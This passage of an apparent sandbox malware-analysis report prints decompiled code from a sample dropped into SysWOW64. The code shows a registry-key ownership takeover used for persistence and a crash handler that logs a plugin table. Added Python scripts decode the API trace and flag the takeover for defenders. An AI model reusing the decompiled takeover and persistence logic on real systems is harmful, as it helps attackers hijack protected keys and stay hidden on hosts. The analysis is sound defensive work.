					__eflags = _t134;
					if(_t134 == 0) {
						_t135 = 0x20000;
					} else {
						asm("sbb eax, eax");
						_t135 = ( ~_a12 & 0x00010006) + 0xe0039;
					}
					__eflags = _t159[1] - _t135;
					if(_t159[1] != _t135) {
						_t159[1] = _t135;
						_t159 = _v20;
						_v24 = 1;
					}
					__eflags =  *_t159;
					if( *_t159 != 0) {
						L30:
						 *_t159 = 0;
						_t136 = _v16;
						__eflags =  *(_t136 + 8);
						_t68 =  *(_t136 + 8) == 0;
						__eflags = _t68;
						_v24 = 1;
						 *((char*)(_v20 + 1)) = 2 + (_t136 & 0xffffff00 | _t68) * 8;
						goto L31;
					} else {
						__eflags = _t159[0] & 0x00000010;
						if((_t159[0] & 0x00000010) == 0) {
							goto L31;
						}
						goto L30;
					}
				} else {
					goto L17;
				}
				while(1) {
					L17:
					_t143 = EqualSid( *(_t176 + _t172 * 4 - 0x100), _v16);
					__eflags = _t143;
					if(_t143 != 0) {
						break;
					}
					_t172 = _t172 + 1;
					__eflags = _t172 - _t164;
					if(_t172 < _t164) {
						continue;
					}
					break;
				}
				__eflags = _t172 - _t164;
				if(_t172 >= _t164) {
					goto L21;
				}
				DeleteAce(_v32, _v8);
				_v24 = 1;
				L32:
				_t117 = _v32;
				__eflags = _v8 - (_t117->AceCount & 0x0000ffff);
			} while (_v8 < (_t117->AceCount & 0x0000ffff));
			__eflags = _v24;
			if(_v24 == 0) {
				goto L47;
			}
			__eflags = "C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe"; // 0x43
			if(__eflags == 0) {
				L41:
				_v12 = 1;
				_t173 = LocalAlloc(0x40, 0x14);
				__eflags = _t173;
				if(_t173 != 0) {
					_t120 = InitializeSecurityDescriptor(_t173, 1);
					__eflags = _t120;
					if(_t120 != 0) {
						_t122 = SetSecurityDescriptorDacl(_t173, 1, _v32, 0);
						__eflags = _t122;
						if(_t122 != 0) {
							_t123 = RegSetKeySecurity(_v28, 4, _t173);
							__eflags = _t123;
							if(_t123 == 0) {
								_v12 = 1;
							}
						}
					}
					LocalFree(_t173);
				}
				goto L47;
			}
			__eflags =  *0x412cc0; // 0x1
			if(__eflags == 0) {
				goto L41;
			}
			_v12 = 0;
			_t125 = RegOpenKeyExA(_a4, _a8, 0, 0x103,  &_v12);
			__eflags = _t125;
			if(_t125 != 0) {
				goto L41;
			}
			_t158 = "C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe";
			_t126 = _t158;
			_t174 =  &(_t126[1]);
			do {
				_t161 =  *_t126;
				_t126 =  &(_t126[1]);
				__eflags = _t161;
			} while (_t161 != 0);
			_t130 = RegSetValueExA(_v12, E00402544(0x4122f8, 0x4106dc, 0xa, 0xe4, 0xc8), 0, 2, _t158, _t126 - _t174 + 1);
			__eflags = _t130;
			if(_t130 == 0) {
				 *0x412cc0 = 0;
			}
			goto L41;
		}
		_t146 = EqualSid( &_v132, _v16);
		__eflags = _t146;
		if(_t146 != 0) {
			goto L12;
		}
		_v12 = 1;
		_t175 = LocalAlloc(0x40, 0x14);
		__eflags = _t175;
		if(_t175 != 0) {
			_t148 = InitializeSecurityDescriptor(_t175, 1);
			__eflags = _t148;
			if(_t148 != 0) {
				_t151 = SetSecurityDescriptorOwner(_t175,  &_v132, 0);
				__eflags = _t151;
				if(_t151 != 0) {
					RegSetKeySecurity(_v28, 1, _t175);
				}
			}
			LocalFree(_t175);
		}
		goto L12;
	}
}
                                                                                                                                  0x00407ca1
                                                                                                                                  0x00407ca1
                                                                                                                                  0x00407ca5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407ca5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407c1d
                                                                                                                                  0x00407c1d
                                                                                                                                  0x00407c27
                                                                                                                                  0x00407c2d
                                                                                                                                  0x00407c2f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407c31
                                                                                                                                  0x00407c32
                                                                                                                                  0x00407c34
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407c34
                                                                                                                                  0x00407c36
                                                                                                                                  0x00407c38
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407c40
                                                                                                                                  0x00407c46
                                                                                                                                  0x00407cc9
                                                                                                                                  0x00407cc9
                                                                                                                                  0x00407cd0
                                                                                                                                  0x00407cd0
                                                                                                                                  0x00407cd9
                                                                                                                                  0x00407cdc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407ce2
                                                                                                                                  0x00407ce8
                                                                                                                                  0x00407d5a
                                                                                                                                  0x00407d61
                                                                                                                                  0x00407d6a
                                                                                                                                  0x00407d6c
                                                                                                                                  0x00407d6e
                                                                                                                                  0x00407d72
                                                                                                                                  0x00407d78
                                                                                                                                  0x00407d7a
                                                                                                                                  0x00407d82
                                                                                                                                  0x00407d88
                                                                                                                                  0x00407d8a
                                                                                                                                  0x00407d92
                                                                                                                                  0x00407d98
                                                                                                                                  0x00407d9a
                                                                                                                                  0x00407d9c
                                                                                                                                  0x00407d9c
                                                                                                                                  0x00407d9a
                                                                                                                                  0x00407d8a
                                                                                                                                  0x00407da0
                                                                                                                                  0x00407da0
                                                                                                                                  0x00000000
                                                                                                                                  0x00407d6e
                                                                                                                                  0x00407cea
                                                                                                                                  0x00407cf0
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407cff
                                                                                                                                  0x00407d05
                                                                                                                                  0x00407d0b
                                                                                                                                  0x00407d0d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407d0f
                                                                                                                                  0x00407d14
                                                                                                                                  0x00407d16
                                                                                                                                  0x00407d19
                                                                                                                                  0x00407d19
                                                                                                                                  0x00407d1b
                                                                                                                                  0x00407d1c
                                                                                                                                  0x00407d1c
                                                                                                                                  0x00407d4a
                                                                                                                                  0x00407d50
                                                                                                                                  0x00407d52
                                                                                                                                  0x00407d54
                                                                                                                                  0x00407d54
                                                                                                                                  0x00000000
                                                                                                                                  0x00407d52
                                                                                                                                  0x00407b6a
                                                                                                                                  0x00407b70
                                                                                                                                  0x00407b72
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407b7b
                                                                                                                                  0x00407b84
                                                                                                                                  0x00407b86
                                                                                                                                  0x00407b88
                                                                                                                                  0x00407b8c
                                                                                                                                  0x00407b92
                                                                                                                                  0x00407b94
                                                                                                                                  0x00407b9c
                                                                                                                                  0x00407ba2
                                                                                                                                  0x00407ba4
                                                                                                                                  0x00407bab
                                                                                                                                  0x00407bab
                                                                                                                                  0x00407ba4
                                                                                                                                  0x00407bb2
                                                                                                                                  0x00407bb2
                                                                                                                                  0x00000000
                                                                                                                                  0x00407b88

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(000000E4,00000022,00000000,000E0100,00000000,00000000), ref: 00407ABA
                                                                                                                                  • GetUserNameA.ADVAPI32(?,?), ref: 00407ADF
                                                                                                                                  • LookupAccountNameA.ADVAPI32(00000000,?,?,0041070C,?,?,?), ref: 00407B16
                                                                                                                                  • RegGetKeySecurity.ADVAPI32(00000000,00000005,?,?), ref: 00407B3B
                                                                                                                                  • GetSecurityDescriptorOwner.ADVAPI32(?,00000022,80000002), ref: 00407B59
                                                                                                                                  • EqualSid.ADVAPI32(?,00000022), ref: 00407B6A
                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000014), ref: 00407B7E
                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407B8C
                                                                                                                                  • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407B9C
                                                                                                                                  • RegSetKeySecurity.ADVAPI32(00000000,00000001,00000000), ref: 00407BAB
                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00407BB2
                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,00407FC9,?,00000000), ref: 00407BCE
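The API sequence above is the registry-key ownership takeover that lets the dropped copy under C:\Windows\SysWOW64\ghrubsm\ rewrite a key it does not own: read the key's current security descriptor (RegGetKeySecurity with SECURITY_INFORMATION 5 = OWNER | DACL), compare its owner SID with the caller's own SID (LookupAccountNameA, EqualSid), and if they differ, build a fresh descriptor whose owner is the caller and write it back (SetSecurityDescriptorOwner, RegSetKeySecurity with 1 = OWNER), after which the DACL can be edited. The following script is an added example written for this page, not part of the Joe Sandbox report or of the sample: it parses the twelve trace lines exactly as listed (embedded as a constructed inline string so it runs offline), names the SECURITY_INFORMATION and registry access-mask bits using the standard winnt.h/winreg.h values, and flags the take-ownership pattern. Treating the fourth captured value of RegOpenKeyExA as samDesired is an assumption; the tracer prints whatever sat at the call site, and "?" marks values it could not resolve.

```python
"""Decode the ADVAPI32 call sequence from the report and flag the
registry-key ownership takeover it implements (added example, not report code)."""
import re
from dataclasses import dataclass
from typing import Optional

# The twelve trace lines of this function, copied from the "APIs" list above
# and embedded as a constructed string so the script runs offline.
TRACE = """
RegOpenKeyExA.ADVAPI32(000000E4,00000022,00000000,000E0100,00000000,00000000), ref: 00407ABA
GetUserNameA.ADVAPI32(?,?), ref: 00407ADF
LookupAccountNameA.ADVAPI32(00000000,?,?,0041070C,?,?,?), ref: 00407B16
RegGetKeySecurity.ADVAPI32(00000000,00000005,?,?), ref: 00407B3B
GetSecurityDescriptorOwner.ADVAPI32(?,00000022,80000002), ref: 00407B59
EqualSid.ADVAPI32(?,00000022), ref: 00407B6A
LocalAlloc.KERNEL32(00000040,00000014), ref: 00407B7E
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407B8C
SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407B9C
RegSetKeySecurity.ADVAPI32(00000000,00000001,00000000), ref: 00407BAB
LocalFree.KERNEL32(00000000), ref: 00407BB2
GetSecurityDescriptorDacl.ADVAPI32(?,00407FC9,?,00000000), ref: 00407BCE
"""

# SECURITY_INFORMATION bits (winnt.h): 2nd argument of Reg{Get,Set}KeySecurity.
SECURITY_INFORMATION = {
    0x1: "OWNER_SECURITY_INFORMATION",
    0x2: "GROUP_SECURITY_INFORMATION",
    0x4: "DACL_SECURITY_INFORMATION",
    0x8: "SACL_SECURITY_INFORMATION",
}

# Registry access-mask bits (winreg.h / winnt.h) relevant to samDesired.
REG_ACCESS = {
    0x00000001: "KEY_QUERY_VALUE",
    0x00000002: "KEY_SET_VALUE",
    0x00000004: "KEY_CREATE_SUB_KEY",
    0x00000008: "KEY_ENUMERATE_SUB_KEYS",
    0x00000010: "KEY_NOTIFY",
    0x00000020: "KEY_CREATE_LINK",
    0x00000100: "KEY_WOW64_64KEY",
    0x00000200: "KEY_WOW64_32KEY",
    0x00010000: "DELETE",
    0x00020000: "READ_CONTROL",
    0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER",
}

LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<dll>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")


@dataclass
class Call:
    api: str
    dll: str
    args: list   # int for captured values, None where the tracer printed "?"
    ref: int     # call-site address in the memory dump


def parse_trace(text: str) -> list:
    """Parse the report's 'Api.DLL(args), ref: addr' lines into Call records."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("\u2022 ").strip()   # drop the bullet if present
        if not line:
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised trace line: {line!r}")
        args = []
        for a in m["args"].split(","):
            a = a.strip()
            if a:
                args.append(None if a == "?" else int(a, 16))
        calls.append(Call(m["api"], m["dll"], args, int(m["ref"], 16)))
    return calls


def decode_flags(value: int, table: dict) -> list:
    """Name each set bit found in table; leftover unknown bits are kept as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    known = sum(bit for bit in table if value & bit)
    if value & ~known:
        names.append(f"0x{value & ~known:08x}")
    return names


def open_access(calls: list) -> list:
    """Decode samDesired of the first RegOpenKeyExA (assumed to be the 4th captured value)."""
    for c in calls:
        if c.api == "RegOpenKeyExA" and len(c.args) > 3 and c.args[3] is not None:
            return decode_flags(c.args[3], REG_ACCESS)
    return []


def find_owner_takeover(calls: list) -> Optional[dict]:
    """Return call sites of the take-ownership pattern, or None if it is absent.

    Pattern: read the key's owner (RegGetKeySecurity with the OWNER bit),
    compare it (GetSecurityDescriptorOwner, EqualSid), then replace it
    (SetSecurityDescriptorOwner, RegSetKeySecurity with the OWNER bit)."""
    order = ["RegGetKeySecurity", "GetSecurityDescriptorOwner", "EqualSid",
             "SetSecurityDescriptorOwner", "RegSetKeySecurity"]
    matched = []
    for c in calls:
        if c.api != order[len(matched)]:
            continue
        if c.api.startswith("Reg"):
            info = c.args[1] if len(c.args) > 1 else None
            if info is None or not info & 0x1:      # OWNER_SECURITY_INFORMATION required
                continue
        matched.append(c)
        if len(matched) == len(order):
            return {
                "call_sites": [hex(m.ref) for m in matched],
                "read": decode_flags(matched[0].args[1], SECURITY_INFORMATION),
                "write": decode_flags(matched[-1].args[1], SECURITY_INFORMATION),
            }
    return None


if __name__ == "__main__":
    trace = parse_trace(TRACE)
    print("RegOpenKeyExA samDesired:", open_access(trace))
    print("take-ownership pattern:", find_owner_takeover(trace))
```

Decoding samDesired as 0xE0100 gives READ_CONTROL | WRITE_DAC | WRITE_OWNER | KEY_WOW64_64KEY, which is the access a 32-bit process (note the SysWOW64 path) needs to rewrite the owner and DACL of a key in the 64-bit registry view. On a live host the same takeover shows up as an owner change on a key that was previously owned by SYSTEM or TrustedInstaller, so comparing key owners against a known-good baseline is the corresponding hunt.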
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
                                                                                                                                  • String ID: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe$D
                                                                                                                                  • API String ID: 2976863881-1098992889
                                                                                                                                  • Opcode ID: d4f479c9f78d504b8da3df740f472ce51a34dde969fc05e485fb9939b8f25359
                                                                                                                                  • Instruction ID: e17c9e5f60e255820364911aa1186e0accab4a2e7248257c6285c946b731c67d
                                                                                                                                  • Opcode Fuzzy Hash: d4f479c9f78d504b8da3df740f472ce51a34dde969fc05e485fb9939b8f25359
                                                                                                                                  • Instruction Fuzzy Hash: 6FA14D71D04219ABDB119FA0DD44EEF7B78FF48304F04807AE505F2290D779AA85CB69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 57%
                                                                                                                                  			E00406511(void* __ecx) {
                                                                                                                                  				signed int _t75;
                                                                                                                                  				signed int _t76;
                                                                                                                                  				int _t78;
                                                                                                                                  				void* _t83;
                                                                                                                                  				signed int _t93;
                                                                                                                                  				void* _t95;
                                                                                                                                  				signed int _t99;
                                                                                                                                  				int _t101;
                                                                                                                                  				int _t115;
                                                                                                                                  				int _t117;
                                                                                                                                  				void* _t118;
                                                                                                                                  				void* _t119;
                                                                                                                                  				void* _t120;
                                                                                                                                  				void* _t122;
                                                                                                                                  				intOrPtr _t135;
                                                                                                                                  				intOrPtr* _t137;
                                                                                                                                  				void* _t139;
                                                                                                                                  				void* _t141;
                                                                                                                                  				void* _t143;
                                                                                                                                  				void* _t144;
                                                                                                                                  				void* _t152;
                                                                                                                                  
                                                                                                                                  				_t122 = __ecx;
                                                                                                                                  				_t139 = _t141 - 0x74;
                                                                                                                                  				_t75 =  *(_t139 + 0x7c);
                                                                                                                                  				_t135 =  *((intOrPtr*)(_t75 + 4));
                                                                                                                                  				_t76 =  *_t75;
                                                                                                                                  				 *(_t139 + 0x7c) = _t76;
                                                                                                                                  				_t78 = wsprintfA(_t139 - 0x898, "\nver=%d date=%s %s\nc=%08x a=%p", 0x5e, "Jan 13 2018", "12:08:32",  *_t76,  *((intOrPtr*)(_t76 + 0xc)));
                                                                                                                                  				_t143 = _t141 - 0x90c + 0x1c;
                                                                                                                                  				_t117 = _t78;
                                                                                                                                  				if(IsBadReadPtr( *( *(_t139 + 0x7c) + 0xc), 8) != 0) {
                                                                                                                                  					E0040E318();
                                                                                                                                  					ExitProcess(0);
                                                                                                                                  				}
                                                                                                                                  				_t83 =  *( *(_t139 + 0x7c) + 0xc);
                                                                                                                                  				__imp__#8( *((intOrPtr*)(_t83 + 4)), E00406511);
                                                                                                                                  				__imp__#8();
                                                                                                                                  				_t118 = _t117 + wsprintfA(_t139 + _t117 - 0x898, " va=%08X%08X uef=%p",  *( *(_t139 + 0x7c) + 0xc),  *( *( *(_t139 + 0x7c) + 0xc)), _t83);
                                                                                                                                  				_t119 = _t118 + wsprintfA(_t139 + _t118 - 0x898, "\n_ax=%p\t_bx=%p\t_cx=%p\t_dx=%p\t_si=%p\t_di=%p\t_bp=%p\t_sp=%p\n",  *((intOrPtr*)(_t135 + 0xb0)),  *((intOrPtr*)(_t135 + 0xa4)),  *((intOrPtr*)(_t135 + 0xac)),  *((intOrPtr*)(_t135 + 0xa8)),  *((intOrPtr*)(_t135 + 0xa0)),  *((intOrPtr*)(_t135 + 0x9c)),  *((intOrPtr*)(_t135 + 0xb4)),  *((intOrPtr*)(_t135 + 0xc4)));
                                                                                                                                  				E0040EE2A(_t122, _t139 - 0x98, 0, 0x108);
                                                                                                                                  				_t144 = _t143 + 0x48;
                                                                                                                                  				// Fill a STACKFRAME64 at ebp-0x98 from the exception CONTEXT (_t135) of the faulting thread:
                                                                                                                                  				// AddrPC <- CONTEXT.Eip (+0xb8), AddrStack <- CONTEXT.Esp (+0xc4), AddrFrame <- CONTEXT.Ebp (+0xb4);
                                                                                                                                  				// every .Mode field is set to 3 (AddrModeFlat). The interleaved pushes are the trailing
                                                                                                                                  				// arguments of the StackWalk64 call made in the loop below.
                                                                                                                                  				 *((intOrPtr*)(_t139 - 0x98)) =  *((intOrPtr*)(_t135 + 0xb8));   // AddrPC.Offset = Eip
                                                                                                                                  				_t93 = 3;                                                        // AddrModeFlat
                                                                                                                                  				_push(0);                                                        // TranslateAddress = NULL
                                                                                                                                  				_push(0);                                                        // GetModuleBaseRoutine = NULL
                                                                                                                                  				 *(_t139 - 0x8c) = _t93;                                         // AddrPC.Mode
                                                                                                                                  				 *((intOrPtr*)(_t139 - 0x94)) = 0;                               // AddrPC.Offset, high dword
                                                                                                                                  				_push(0);                                                        // FunctionTableAccessRoutine = NULL
                                                                                                                                  				 *(_t139 - 0x5c) = _t93;                                         // AddrStack.Mode
                                                                                                                                  				_push(0);                                                        // ReadMemoryRoutine = NULL (dbghelp uses ReadProcessMemory)
                                                                                                                                  				 *((intOrPtr*)(_t139 - 0x68)) =  *((intOrPtr*)(_t135 + 0xc4));   // AddrStack.Offset = Esp
                                                                                                                                  				 *((intOrPtr*)(_t139 - 0x64)) = 0;                               // AddrStack.Offset, high dword
                                                                                                                                  				_t130 =  *((intOrPtr*)(_t135 + 0xb4));                           // Ebp; the decompiler shows this register as the first argument of E0040E8A1 below
                                                                                                                                  				 *(_t139 - 0x6c) = _t93;                                         // AddrFrame.Mode
                                                                                                                                  				 *(_t139 + 0x7c) = _t93;                                         // frame budget: at most 3 frames are walked
                                                                                                                                  				_push(_t135);                                                    // ContextRecord
                                                                                                                                  				_push(_t139 - 0x98);                                             // StackFrame
                                                                                                                                  				 *((intOrPtr*)(_t139 - 0x78)) =  *((intOrPtr*)(_t135 + 0xb4));   // AddrFrame.Offset = Ebp
                                                                                                                                  				 *((intOrPtr*)(_t139 - 0x74)) = 0;                               // AddrFrame.Offset, high dword
                                                                                                                                  				_push(0);                                                        // hThread = NULL
                                                                                                                                  				// Walk the stack with dbghelp!StackWalk64 (0x14c = IMAGE_FILE_MACHINE_I386) and append one
                                                                                                                                  				// text line per frame to the 0x898-byte report buffer at ebp-0x898; _t119 is the write offset
                                                                                                                                  				// already used by the header part of the report (outside this excerpt).
                                                                                                                                  				while(1) {
                                                                                                                                  					_t95 = GetCurrentProcess();
                                                                                                                                  					__imp__StackWalk64(0x14c, _t95);   // remaining seven arguments were pushed above
                                                                                                                                  					if(_t95 == 0) {                    // _t95 now holds StackWalk64's return value: FALSE = end of stack
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					_t95 = 0;
                                                                                                                                  					if( *(_t139 + 0x7c) != 0) {                        // frame budget left?
                                                                                                                                  						if( *((intOrPtr*)(_t139 - 0x88)) != 0) {       // STACKFRAME64.AddrReturn.Offset != 0
                                                                                                                                  							// Return address plus the four STACKFRAME64.Params slots (ebp-0x40 .. ebp-0x28),
                                                                                                                                  							// i.e. the first four stack arguments of the frame.
                                                                                                                                  							_t115 = wsprintfA(_t139 + _t119 - 0x898, "ret=%p\tp1=%p\tp2=%p\tp3=%p\tp4=%p\n",  *((intOrPtr*)(_t139 - 0x88)),  *((intOrPtr*)(_t139 - 0x40)),  *((intOrPtr*)(_t139 - 0x38)),  *((intOrPtr*)(_t139 - 0x30)),  *((intOrPtr*)(_t139 - 0x28)));
                                                                                                                                  							_t144 = _t144 + 0x1c;    // cdecl cleanup of the seven wsprintfA arguments
                                                                                                                                  							_t119 = _t119 + _t115;   // advance the write offset by the bytes written
                                                                                                                                  							_t95 = 0;
                                                                                                                                  						}
                                                                                                                                  						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) - 1;   // one frame consumed even if nothing was printed
                                                                                                                                  						// Re-push the same StackWalk64 arguments for the next iteration.
                                                                                                                                  						_push(_t95);
                                                                                                                                  						_push(_t95);
                                                                                                                                  						_push(_t95);
                                                                                                                                  						_push(_t95);
                                                                                                                                  						_push(_t135);
                                                                                                                                  						_push(_t139 - 0x98);
                                                                                                                                  						_push(_t95);
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					break;
                                                                                                                                  				}
                                                                                                                                  				// Both loop exits leave _t95 == 0, so the frame counter is reused as "plugins printed so far".
                                                                                                                                  				 *(_t139 + 0x7c) = _t95;
                                                                                                                                  				_t120 = _t119 + wsprintfA(_t139 + _t119 - 0x898, "plgs:");
                                                                                                                                  				 *(_t139 + 0x70) =  *(_t139 + 0x70) & 0x00000000;   // slot index = 0
                                                                                                                                  				do {
                                                                                                                                  					// Plugin table: 0x20 four-byte slots at 0x412c40; a non-zero slot holds the address of a loaded plugin.
                                                                                                                                  					_t137 = 0x412c40 +  *(_t139 + 0x70) * 4;
                                                                                                                                  					if( *_t137 != 0) {
                                                                                                                                  						// Compiler idiom for a signed (count % 8). The decompiler dropped the non-negative
                                                                                                                                  						// branch (_t152 = _t99); since count only ever counts up from 0 here, the test below
                                                                                                                                  						// is simply "start a new line before every eighth entry".
                                                                                                                                  						_t99 =  *(_t139 + 0x7c) & 0x80000007;
                                                                                                                                  						if(_t99 < 0) {
                                                                                                                                  							_t152 = (_t99 - 0x00000001 | 0xfffffff8) + 1;
                                                                                                                                  						}
                                                                                                                                  						if(_t152 == 0) {
                                                                                                                                  							_t120 = _t120 + wsprintfA(_t139 + _t120 - 0x898, "\n");
                                                                                                                                  						}
                                                                                                                                  						_t101 = wsprintfA(_t139 + _t120 - 0x898, "\t%d=%p",  *(_t139 + 0x70),  *_t137);   // "<slot>=<plugin address>"
                                                                                                                                  						_t144 = _t144 + 0x10;    // cdecl cleanup of the four wsprintfA arguments
                                                                                                                                  						_t120 = _t120 + _t101;
                                                                                                                                  						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) + 1;   // plugins printed
                                                                                                                                  					}
                                                                                                                                  					 *(_t139 + 0x70) =  *(_t139 + 0x70) + 1;
                                                                                                                                  				} while ( *(_t139 + 0x70) < 0x20);
                                                                                                                                  				wsprintfA(_t139 + _t120 - 0x898, "\n");
                                                                                                                                  				// Hand the finished report to E0040E8A1 with the keys "localcfg" / "except_info" (from the
                                                                                                                                  				// arguments, apparently the sample's own config store), then call E0040E318 (not shown here).
                                                                                                                                  				E0040E8A1(_t130, 1, "localcfg", "except_info", _t139 - 0x898);
                                                                                                                                  				E0040E318();
                                                                                                                                  				return 1;
                                                                                                                                  			}
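The handler above formats its crash record with fixed wsprintfA strings, so the record can be regenerated and parsed offline when it turns up in a dump or in the bot's stored configuration. The following Python is an added example and not code from the sample or from the Joe Sandbox report: it rebuilds the layout the decompiled logic implies (at most three stack frames, frames with a zero return address skipped but still counted, the non-empty slots of the 0x20-entry plugin table listed eight per line), parses such a record back, and attributes a frame's return address to the plugin whose base is nearest below it. The header line's layout is only assumed from the format strings listed under String ID and is kept opaque; every address in the sample input is constructed for the demo.

```python
"""Formatter/parser for the "except_info" crash record written by the handler above.

Added example, not code from the sample or from Joe Sandbox. Record layout taken from
the wsprintfA format strings in the decompiled function ("ret=%p\tp1=%p...", "plgs:",
"\t%d=%p"); the header line layout is assumed and treated as an opaque string.
"""
import re
from dataclasses import dataclass, field

PLUGIN_SLOTS = 0x20    # the handler scans 0x20 four-byte slots at 0x412c40
MAX_FRAMES = 3         # frame budget starts at 3, decremented per StackWalk64 result
PLUGINS_PER_LINE = 8   # a "\n" is emitted whenever (plugins printed) % 8 == 0

FRAME_RE = re.compile(
    r"^ret=(?P<ret>[0-9A-Fa-f]+)\tp1=(?P<p1>[0-9A-Fa-f]+)\tp2=(?P<p2>[0-9A-Fa-f]+)"
    r"\tp3=(?P<p3>[0-9A-Fa-f]+)\tp4=(?P<p4>[0-9A-Fa-f]+)$"
)
PLUGIN_RE = re.compile(r"(\d+)=([0-9A-Fa-f]+)")


@dataclass
class Frame:
    ret: int        # STACKFRAME64.AddrReturn.Offset
    params: tuple   # STACKFRAME64.Params[0..3]


@dataclass
class ExceptInfo:
    header: str
    frames: list = field(default_factory=list)
    plugins: dict = field(default_factory=dict)   # slot index -> plugin address


def format_except_info(header: str, frames, plugins: dict) -> str:
    """Produce the record exactly as the decompiled handler lays it out."""
    out = [header]
    for fr in frames[:MAX_FRAMES]:            # budget of 3, consumed even when nothing is printed
        if fr.ret != 0:                       # handler prints only frames with a return address
            out.append("ret=%08X\tp1=%08X\tp2=%08X\tp3=%08X\tp4=%08X\n" % (fr.ret, *fr.params))
    out.append("plgs:")
    count = 0
    for slot in range(PLUGIN_SLOTS):
        base = plugins.get(slot, 0)
        if base == 0:                         # empty table slot
            continue
        if count % PLUGINS_PER_LINE == 0:     # newline before entries 0, 8, 16, ...
            out.append("\n")
        out.append("\t%d=%08X" % (slot, base))
        count += 1
    out.append("\n")
    return "".join(out)


def parse_except_info(text: str) -> ExceptInfo:
    """Parse a record back into header, stack frames and plugin table."""
    header_lines, frames, plugins = [], [], {}
    in_plugins = False
    for line in text.split("\n"):
        if in_plugins:                        # everything after "plgs:" is "<slot>=<addr>" pairs
            for slot, base in PLUGIN_RE.findall(line):
                plugins[int(slot)] = int(base, 16)
            continue
        if line == "plgs:":
            in_plugins = True
            continue
        m = FRAME_RE.match(line)
        if m:
            frames.append(Frame(int(m["ret"], 16),
                                tuple(int(m[k], 16) for k in ("p1", "p2", "p3", "p4"))))
        elif line:                            # anything else before the frames is header text
            header_lines.append(line)
    return ExceptInfo("\n".join(header_lines), frames, plugins)


def attribute_frame(info: ExceptInfo, address: int):
    """Slot of the plugin whose base is the highest one at or below address, or None.

    Plugin sizes are not in the record, so "nearest lower base" is the usual heuristic
    for deciding which loaded plugin a return address belongs to.
    """
    candidates = [(base, slot) for slot, base in info.plugins.items() if base <= address]
    return max(candidates)[1] if candidates else None


# Constructed sample input: all addresses below are invented for the demo.
SAMPLE_FRAMES = [
    Frame(0x10010A3C, (0x00000001, 0x0019FF10, 0x00000000, 0x00412C40)),
    Frame(0, (0, 0, 0, 0)),                   # zero return address: counted, not printed
    Frame(0x00406611, (0x0019FE40, 0x00000002, 0xC0000005, 0x00000000)),
    Frame(0x00401000, (0, 0, 0, 0)),          # fourth frame: beyond the 3-frame budget
]
SAMPLE_PLUGINS = {1: 0x10000000, 3: 0x10010000, 5: 0x10020000, 7: 0x10030000,
                  9: 0x10040000, 11: 0x10050000, 13: 0x10060000, 15: 0x10070000,
                  17: 0x10080000}             # nine entries: eight on line one, one on line two
SAMPLE_HEADER = "ver=1 date=Jan 13 2018 12:08:32c=c0000005 a=10010A3C\n"   # layout assumed

SAMPLE_RECORD = format_except_info(SAMPLE_HEADER, SAMPLE_FRAMES, SAMPLE_PLUGINS)


def demo():
    """Parse the constructed record and attribute its first frame to a plugin slot."""
    info = parse_except_info(SAMPLE_RECORD)
    return info, attribute_frame(info, info.frames[0].ret)


if __name__ == "__main__":
    parsed, slot = demo()
    print(SAMPLE_RECORD)
    print("frames:", len(parsed.frames), "plugins:", sorted(parsed.plugins), "frame 0 in slot:", slot)
```

Because the handler prints plugin addresses but no sizes, `attribute_frame` can only say which loaded plugin starts nearest below a return address; a frame that lies in the main module (like the constructed 0x00406611) yields None rather than a wrong slot.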
                                                                                                                                  Instruction addresses for the statements above (the report's side-by-side address column, flattened into one list; 0x00000000 where the report assigns no address):
